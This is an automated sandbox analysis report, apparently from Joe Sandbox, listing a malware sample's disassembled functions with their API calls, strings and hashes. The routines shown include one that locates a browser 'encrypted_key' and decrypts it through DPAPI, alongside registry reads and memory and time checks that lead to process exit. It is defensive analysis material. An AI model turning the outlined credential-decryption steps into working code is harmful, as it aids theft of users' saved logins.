                                            • API String ID: 2667927680-2872761854
                                            • Opcode ID: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
                                            • Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
                                            • Opcode Fuzzy Hash: a663d27af1db11ea6e0538481b6c1ec1bf0866bdd2edd05cd7ef4aaec1a8ff54
                                            • Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95
                                            Function 02451487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 024514A5
                                            • __aulldiv.LIBCMT ref: 024514BF
                                            • __aulldiv.LIBCMT ref: 024514CD
                                            • ExitProcess.KERNEL32 ref: 024514FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction ID: 18516df1c6281785205b49b9221a0665ccc334cabd8a04a8e929b6104f7f5f64
                                            • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction Fuzzy Hash: 01016DB0D44308FEEF10DBD0CD89B9EBB79AB0070AF20844AEA09BA2C0D77495458B56
                                            Function 0245A7C7 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 155memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memcmp.MSVCRT(?,0042124C,00000003), ref: 0245A7E4
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • memcmp.MSVCRT(?,004210FC,00000003), ref: 0245A839
                                            • memset.MSVCRT ref: 0245A872
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0245A8CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcmp$AllocLocallstrcpymemset
                                            • String ID: @
                                            • API String ID: 631489823-2766056989
                                            • Opcode ID: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                            • Instruction ID: d92db8908ab24b0105d922302a7f964fdb120a6ba7a3dd5784e29a998cd9e7af
                                            • Opcode Fuzzy Hash: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
                                            • Instruction Fuzzy Hash: 6F514C30A00268AFDB18EFA5CD99FED7772BF54304F00811DE9096B591EB74AA45CF51
                                            Function 00410FC0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • strtok_s.MSVCRT ref: 00410FE8
                                            • strtok_s.MSVCRT ref: 0041112D
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                            • Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
                                            • Opcode Fuzzy Hash: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
                                            • Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95
                                            Function 0040A430 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                              • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                              • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                              • Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                              • Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                              • Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
                                              • Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                            • String ID: $"encrypted_key":"$DPAPI
                                            • API String ID: 3731072634-738592651
                                            • Opcode ID: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                            • Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
                                            • Opcode Fuzzy Hash: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
                                            • Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A
                                            Function 0246D0D0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CodeInfoPageValidmemset
                                            • String ID:
                                            • API String ID: 703783727-0
                                            • Opcode ID: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                            • Instruction ID: ae99f83a2daa1a268adb2822acf225323ba8d4f157788557a97b9432f083f559
                                            • Opcode Fuzzy Hash: df407eb42ed6ae19740f6001b4b28ec45f3a0947630176eabde2e48c15dd9d5f
                                            • Instruction Fuzzy Hash: 5C31C170F08291CBEB259F75C89837ABFA0AB46314F1485ABD891CF291C368C446CB52
                                            Function 024CC049 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                            • String ID:
                                            • API String ID: 3136044242-0
                                            • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                            • Instruction ID: a7f1cea617fda5a248391684b2ea28183e76af00ee6c77fe07156e9c35c9315a
                                            • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                            • Instruction Fuzzy Hash: F121857AD01215AEDBA29F5FCC8096F7A66EB95BA4F25411FE81C66310C7308D419FD0
                                            Function 00416BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,009C9490,?,004210F4,?,00000000,?), ref: 00416C0C
                                            • sscanf.NTDLL ref: 00416C39
                                            • SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,009C9490,?,004210F4), ref: 00416C52
                                            • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,009C9490,?,004210F4), ref: 00416C60
                                            • ExitProcess.KERNEL32 ref: 00416C7A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID:
                                            • API String ID: 2533653975-0
                                            • Opcode ID: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                            • Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
                                            • Opcode Fuzzy Hash: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
                                            • Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69
                                            Function 02466E27 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTime.KERNEL32(?), ref: 02466E73
                                            • sscanf.NTDLL ref: 02466EA0
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02466EB9
                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02466EC7
                                            • ExitProcess.KERNEL32 ref: 02466EE1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID:
                                            • API String ID: 2533653975-0
                                            • Opcode ID: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                            • Instruction ID: 9eb4606ce9290aa4c44e78782f22204d4d80e8ca620e0e4c843c52d4b1bdbcdd
                                            • Opcode Fuzzy Hash: 6f773626f3441833338ad6a64aabe7637b4b1e18bec63e878425460b9ebe86da
                                            • Instruction Fuzzy Hash: 8321DCB5D14219ABCF14DFE4E8499EEB7BAFF48300F04852EE516E3250EB349604CB65
                                            Function 00417F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                            • HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                            • RegOpenKeyExA.ADVAPI32(80000002,009CCA20,00000000,00020119,?), ref: 00417FEE
                                            • RegQueryValueExA.ADVAPI32(?,009D0DC8,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                            • RegCloseKey.ADVAPI32(?), ref: 00418022
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction ID: 7366865410052b2090c980cb0782fc53e6cc971cacc9a0cbb18d91746b71e1a2
                                            • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction Fuzzy Hash: 981151B1E45209EBD700CF94DD45FBFBBB9EB48B11F10421AF615A7280E77959048BA2
                                            Function 024681F7 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0246822E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02468235
                                            • RegOpenKeyExA.ADVAPI32(80000002,006D6BD4,00000000,00020119,?), ref: 02468255
                                            • RegQueryValueExA.ADVAPI32(?,006D6EEC,00000000,00000000,000000FF,000000FF), ref: 02468276
                                            • RegCloseKey.ADVAPI32(?), ref: 02468289
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction ID: 001bf3425b4c462425007660bf483e539f312526bc633b969f9c8ab1b4f1c4b0
                                            • Opcode Fuzzy Hash: 7a9c0ba5048ddb27ec33de3f8be0389340df971bddb9b3c1683f2c2c2fb7b9da
                                            • Instruction Fuzzy Hash: 45114CB1E4560AABDB00CFD4DD49FBBBBB9EB44B11F10421AF615AA280D7745904CBA2
                                            Function 02467B17 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02467B2B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467B32
                                            • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,02467AB0), ref: 02467B52
                                            • RegQueryValueExA.ADVAPI32(02467AB0,00420AB4,00000000,00000000,?,000000FF), ref: 02467B71
                                            • RegCloseKey.ADVAPI32(02467AB0), ref: 02467B7B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction ID: c3851170b4f0290579ec24fa623980467ddb013b9d7f2a1be4bf00bcd93e3a21
                                            • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction Fuzzy Hash: 2C01FFB5E45309BBDB00DBE4DC49FAEB779EF44705F10459AF605A6280E774AA00CB91
                                            Function 004193F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrStrA.SHLWAPI(009D0600,00000000,00000000,?,00409F71,00000000,009D0600,00000000), ref: 004193FC
                                            • lstrcpyn.KERNEL32(006D7580,009D0600,009D0600,?,00409F71,00000000,009D0600), ref: 00419420
                                            • lstrlenA.KERNEL32(00000000,?,00409F71,00000000,009D0600), ref: 00419437
                                            • wsprintfA.USER32 ref: 00419457
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID: %s%s
                                            • API String ID: 1206339513-3252725368
                                            • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
                                            • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96
                                            Function 02469657 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrStrA.SHLWAPI(\nm,00000000,00000000,?,0245A1D8,00000000,006D6E5C,00000000), ref: 02469663
                                            • lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,0245A1D8,00000000,006D6E5C), ref: 02469687
                                            • lstrlen.KERNEL32(00000000,?,0245A1D8,00000000,006D6E5C), ref: 0246969E
                                            • wsprintfA.USER32 ref: 024696BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID: \nm
                                            • API String ID: 1206339513-1385846026
                                            • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction ID: 01660fe027666f272699ad7cc90f4303043f554876858b90f8eb866976d28c1a
                                            • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                            • Instruction Fuzzy Hash: 77011E75904208FFCB04DFA8DD48EAE7B79EF48304F108249F9098B340EB31AA40CB96
                                            Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                            • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction ID: b0bfc99e0bb5f41d030d85d97ebb5ad9faa7414484ca5a523084a8432581bb26
                                            • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction Fuzzy Hash: D1013179E45209BFDB00DFD0DC49FAE7779EB48701F00419AFA05A7280E770AA008B91
                                            Function 02451507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0245151B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02451522
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0245153E
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0245155C
                                            • RegCloseKey.ADVAPI32(?), ref: 02451566
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction ID: 011ac6d45b34f752a9a1b004831281654ff03ce0616b51169d100f525f444af0
                                            • Opcode Fuzzy Hash: 105a35557efbe30c530503ad4a66e3d917ab5a2bcfe7a77369b2bd71da3f475d
                                            • Instruction Fuzzy Hash: E101E179E45209BFDB04DFD4DC49FAE7779EB48701F10419AFA0597280E770AA00CB91
                                            Function 0041CA72 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __getptd.LIBCMT ref: 0041CA7E
                                              • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                              • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                            • __getptd.LIBCMT ref: 0041CA95
                                            • __amsg_exit.LIBCMT ref: 0041CAA3
                                            • __lock.LIBCMT ref: 0041CAB3
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                            • Instruction ID: c5a7914bfd81a4edf64c409ce704b1973edb92a02c079c255f399551119664c9
                                            • Opcode Fuzzy Hash: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                            • Instruction Fuzzy Hash: D0F06231A803189BD622FBA95C867DE33A0AF40758F50014FE405562D2CB7C59C186DE
                                            Function 0246CCD9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __getptd.LIBCMT ref: 0246CCE5
                                              • Part of subcall function 0246C507: __getptd_noexit.LIBCMT ref: 0246C50A
                                              • Part of subcall function 0246C507: __amsg_exit.LIBCMT ref: 0246C517
                                            • __getptd.LIBCMT ref: 0246CCFC
                                            • __amsg_exit.LIBCMT ref: 0246CD0A
                                            • __lock.LIBCMT ref: 0246CD1A
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0246CD2E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                            • Instruction ID: 235d0f6dd63c14b167ca6b0c02c68a0cc9146237bfeb1c5394752e12b71b680a
                                            • Opcode Fuzzy Hash: 2c0ddcac0e8e8bcdfdf9741ae957a452135e3d1b714c0b19c8a1c6a09a33287e
                                            • Instruction Fuzzy Hash: 45F09632A003109AD720FB69D88DB7E3B919F0075CF11410FD480EA6D0CB245541CE9B
                                            Function 004168D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                            Download Yara Rule
                                            APIs
